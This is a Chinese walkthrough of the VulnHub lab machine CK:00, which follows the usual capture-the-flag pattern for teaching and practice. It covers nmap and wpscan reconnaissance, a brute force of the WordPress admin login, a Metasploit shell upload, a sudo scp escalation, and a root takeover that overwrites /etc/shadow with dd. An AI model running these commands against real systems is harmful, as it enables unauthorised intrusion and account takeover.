VulnHub:CK00

news2024/11/14 20:31:27

靶场搭建

靶机下载地址:CK: 00 ~ VulnHub

下载后,在vmware中打开靶机。

  1. 修改网络配置为NAT

  2. 处理器修改为2

  3. 启动靶机

靶机ip扫描不到的解决办法

  1. 靶机开机时一直按shift或者esc直到进入GRUB界面。

  2. 按e进入编辑模式,找到ro,修改为如下内容。ctrl+x重启服务。

    rw signie init=/bin/bash quiet
  3. 进入如下页面。如果没有进入说明第二步修改错误,重新执行1,2步。                                  

  4. ip a查看网卡信息。这里网卡是ens33。                                                                                  

  5. 打开网卡配置文件vi /etc/netplan/50-cloud-init.yaml。                                                    

    发现网卡名称不一致,按i修改为以下内容。增加的内容主要是为了将ens33网卡ip配置成攻击机同网段。                                    

    • addresses: [ip/24]

    • gateway4: 网关

    • nameservers: addresses: [dns]

  6. netplan apply生效,再重启靶机即可修改成功。

如果上述步骤仍然不行,在步骤5前增加一步:apt install ifupdown resolvconf

信息收集

主机发现

nmap 192.168.233.0/24 -sP -T4

靶机ip为:192.168.233.121。

端口扫描

nmap 192.168.233.121 -A -T4

开放22,80端口。

目录扫描and网站指纹

首先看看80端口网站首页。最重要的信息是WordPress。

网站指纹扫描确认一下。

whatweb http://192.168.233.121

该网站的确由WordPress搭建。继续目录扫描。

dirsearch -u http://192.168.233.121

根据扫描结果,发现有重定向到ck这个域名的情况,直接访问报错报错,因此需要修改一下hosts文件,vim /etc/hosts,增加一条主机名和IP地址的映射关系:

192.168.233.121  ck

访问/wp-login.php。需要用户密码,用wpscan进行枚举。

访问/wp-includes。没找到名字和内容敏感的文件。

wpscan

根据前面的信息收集,80端口的网站由WordPress搭建,我们使用wpscan(WordPress扫描工具)扫描,目的是枚举用户和密码。

# 枚举用户,插件,主题
wpscan --url http://192.168.233.121 --enumerate u,p,t

根据扫描结果,发现存在admin用户。接下来使用wpscan爆破密码。

wpscan --url http://192.168.233.121 --passwords 字典路径 --usernames admin --max-threads 100

密码是admin。成功登入wordpress后台。

2、漏洞利用

已知WordPress用户名和密码,打开msf,使用unix/webapp/wp_admin_shell_upload模块。

msfconsole
search wp_admin
use 0
options
set rhosts 192.168.233.121
set password admin
set username admin
run

成功拿到meterpreter,看到当前权限不高。进入shell模式,进行信息收集。

shell
# 显示用户名和路径(可以不执行这一步)
python3 -c 'import pty;pty.spawn("/bin/bash")'

切换到home目录,发现存在ck,bla,bla1三个用户。在/home/ck路径下发现第一个flag。

在wp-config.php中找到数据库用户名和密码。cat /var/www/html/wp-config.php

3、提权

得到的密码尝试确认是bla用户的密码。

sudo -l想办法提权。可用利用scp命令拿到bla1的shell。

scp提权

搜一下scp如何提权。百度告诉我们执行以下四步即可提权。

做一下修改,因为是切换到bla1所以命令应该是:sudo -u bla1 scp -S $TF x y:。命令执行后报错Can't open /tmp/tmp.kPOFihNHbV,chmod将这个文件的权限修改为777即可。

rbash

继续提权sudo -l

提示我们利用/bin/rbash拿到ck-00的shell,无密码。rbash是什么,rbash是受限制的 bash,这里可以就当作是/bin/bash使用,直接切换到ck-00。

sudo -u ck-00 /bin/rbash

sudo -l。提示我们通过dd提权到root权限。

dd提权

dd命令是用于读取、转换、输出数据的,dd提权主要是利用对数据的转换来实现的,比如:替换root用户密码hash值从而修改密码达到提权的目的。

在攻击机上生成明文密码的hash。使用mkpasswd生成sha-512加密算法的hash。

# -m 指定加密方式
mkpasswd -m sha-512 123456

参照kali中shadow文件root用户的用户信息,将第二个参数密码的hash值替换成刚刚生成的hash值并保存起来备用。

cat /etc/shadow
# 将结果复制出来,替换一下root用户的hash值
root:$6$lpM1sB/rsDFuAgCN$4kuMA2zqpN9z2O5c5B27GQd.SY3L/R3zC1z4CAQXRJ4jgxW81F3xsE08l7A./1SxBuW/31YBTgcqzKZEI0n.j1:18878:0:99999:7:::

到靶机中,将etc/shadow替换为刚刚备好的内容。

echo 'root:$6$lpM1sB/rsDFuAgCN$4kuMA2zqpN9z2O5c5B27GQd.SY3L/R3zC1z4CAQXRJ4jgxW81F3xsE08l7A./1SxBuW/31YBTgcqzKZEI0n.j1:18878:0:99999:7:::' | sudo dd of=/etc/shadow

执行完毕后,切换到root用户,输入我们设置的密码即可。

get root flag🎆

总结

这里推荐一个网站GTFOBins,用于找提权利用方式的网站。

例如:需要利用dd命令提权,访问该网站,输入dd。

点开后会显示利用方法。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1933958.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Linux(CentOS7)离线安装Redis6

版本 CentOS-7、redis-6 1、下载redis离线包 下载地址:http://download.redis.io/releases/ 2、选择安装包 redis-6.2.5.tar.gz 3、上传安装包至服务器 cd /usr/local/redis #进入目录,没有redis目录则自行创建 tar -zxvf redis-6.2.5.tar.gz #…

拓扑排序(练习题)

文章目录 拓扑排序[P1113 杂务](https://www.luogu.com.cn/problem/P1113)题目描述输入格式输出格式代码(BFS) [P4017 最大食物链计数](https://www.luogu.com.cn/problem/P4017)题目描述输入格式输出格式代码(BFS)代码&#xff0…

Python实战MySQL之数据库操作全流程详解

概要 MySQL是一种广泛使用的关系型数据库管理系统,Python可以通过多种方式与MySQL进行交互。本文将详细介绍如何使用Python操作MySQL数据库,包括安装必要的库、连接数据库、执行基本的CRUD(创建、读取、更新、删除)操作,并包含具体的示例代码,帮助全面掌握这一过程。 准…

基于天地图使用Leaflet.js进行WebGIS开发实战

目录 前言 一、天地图的key 1、创建应用 2、调用限制策略 注: (1)日服务调用超量会暂时拒绝访问,次日自动开启; (2)如果服务调用过程中存在数据爬取或者下载行为,服务调用会被自…

UE4-系统默认天空球的使用

当我们在调整平行光的时候,会发现场景中的光照改变了,但是太阳的位置并没有改变,此时就需要用到系统默认的天空球中的: 但是只有在选中是由平行光的改变而改变的情况下才会发生改变,如果没有选择或者选择其他的光源&am…

爬虫(一)——爬取快手无水印视频

前言 最近对爬虫比较感兴趣,于是浅浅学习了一些关于爬虫的知识。爬虫可以实现很多功能,非常有意思,在这里也分享给大家。由于爬虫能实现的功能太多,而且具体的实现方式也有所不同,所以这里开辟了一个新的系列——爬虫…

MySQL(6)内置函数,复合查询.

目录 1.内置函数; 2.复合查询; 1.内置函数: 1.1 日期函数: 时分秒: 时间戳: 基本日期上加日期: 基本日期减去日期: 日期相差天数: 🌰 创建一张表,记录生日: 创建一个留言表: 显示所有留言信息,发布日期只显示日期,不用显示时间: …

【数据结构】Splay详解

Splay 引入 Splay旋转操作splay操作插入操作查询x排名查询排名为x删除操作查询前驱/后继模板Splay时间复杂度分析 进阶操作截取区间区间加,区间赋值,区间查询,区间最值区间翻转原序列整体插入指定位置插入整体插入末尾区间最大子段和 一些好题…

自动驾驶系列—智能巡航辅助功能中的横向避让功能介绍

文章目录 1. 背景介绍2. 功能定义3. 功能原理4. 传感器架构5. 实际应用案例5.1 典型场景1:前方车辆压线5.2 典型场景2:相邻车道有大型车辆5.3 典型场景3:它车近距离cut in 6. 总结与展望 1. 背景介绍 随着汽车技术的发展,智能巡航…

一些常见的网络故障

📑打牌 : da pai ge的个人主页 🌤️个人专栏 : da pai ge的博客专栏 ☁️宝剑锋从磨砺出,梅花香自苦寒来 ☁️运维工程师的职责:监…

关于我在vue3中使用swiper的使用碰到swiper-slide的width特别大的这件事儿

一. 环境 "vue": "^3.3.8","swiper": "^10.0.4",二. 问题描述 原代码: <template><swiperclass"wq-swiper":space-betwee"spaceBetween":pagination"{ clickable: true }":modules"mod…

Unity发微信小游戏记录

Unity2Wechat 流程1.小程序AppID2.Unity 插件3.微信开发者工具4.CDN资源服 参考文档 流程 1.小程序AppID 已有账号 登陆公众平台获取小程序AppID https://mp.weixin.qq.com/ 无账号 注册小程序 https://developers.weixin.qq.com/minigame/dev/guide/ 经营类目需要是游戏大类…

msvcr120.dll丢失的原因分析,msvcr120.dll丢失的解决方法分享

在日常使用电脑的过程中&#xff0c;我们可能会遇到一些错误提示或程序无法正常运行的问题。其中&#xff0c;msvcr120.dll丢失是一种常见的错误&#xff0c;它会导致某些应用程序无法启动或运行。本文将分析msvcr120.dll丢失的原因&#xff0c;并介绍5种解决方法以及修复过程中…

postman双击打不开的解决方案

postman双击打不开的解决方案 深入再深入 于 2022-05-09 15:45:56 发布 阅读量3.1k 收藏 2 点赞数 4 文章标签&#xff1a; postman 版权 右键属性 安装路径 更新版本 回滚 问题排查 关键词由CSDN通过智能技术生成 解决方案&#xff1a; 右键-属性&#xff0c;复制安装路…

App Inventor 2 天气预报App开发 - 第三方API接入的通用方法(2)

本文来自AppInventor2中文网&#xff08;www.fun123.cn&#xff09;参考文档&#xff0c;调用第三方天气接口获取天气JSON数据&#xff0c;解析并展示在App上。 App效果图&#xff0c;展示未来7日的天气预报&#xff0c;包括日期、天气图示和温度&#xff1a; App原理介绍 通…

RT-DETR+Flask实现目标检测推理案例

今天&#xff0c;带大家利用RT-DETR&#xff08;我们可以换成任意一个模型&#xff09;Flask来实现一个目标检测平台小案例&#xff0c;其实现效果如下&#xff1a; 目标检测案例 这个案例很简单&#xff0c;就是让我们上传一张图像&#xff0c;随后选择一下置信度&#xff0c;…

【博士每天一篇文献-算法】连续学习算法之HNet:Continual learning with hypernetworks

阅读时间&#xff1a;2023-12-26 1 介绍 年份&#xff1a;2019 作者&#xff1a;Johannes von Oswald&#xff0c;Google Research&#xff1b;Christian Henning&#xff0c;EthonAI AG&#xff1b;Benjamin F. Grewe&#xff0c;苏黎世联邦理工学院神经信息学研究所 期刊&a…

解决虚拟机与主机ping不通,解决主机没有vmware网络

由于注册表文件缺失导致&#xff0c;使用这个工具 下载cclean 白嫖就行 https://www.ccleaner.com/ 是 点击修复就可以了

《TF2.x》强化学习手册-P47-P59-TD时序差分-Monte_carlo蒙特卡洛预测与控制算法

文章目录 实现时序差分学习前期准备实现步骤工作原理 构建强化学习中的蒙特卡洛预测和控制算法前期准备实现步骤工作原理 实现时序差分学习 时序差分&#xff08;Temporal Difference &#xff0c;TD&#xff09;算法。TD算法是一种预测值或目标值校正的方法&#xff0c;用于强…

JRT实体视图查询

JRT的设计目标就是多数据库支持&#xff0c;对于爬行周边数据提供DolerGet解决爬取多维数据问题。但是对于通过父表字段筛选子表数据就不能通过DolerGet取数据了&#xff0c;因为查询到的父表数据没有子表数据的ID。 比如下面表&#xff1a; 我需要按登记号查询这个登记号的报…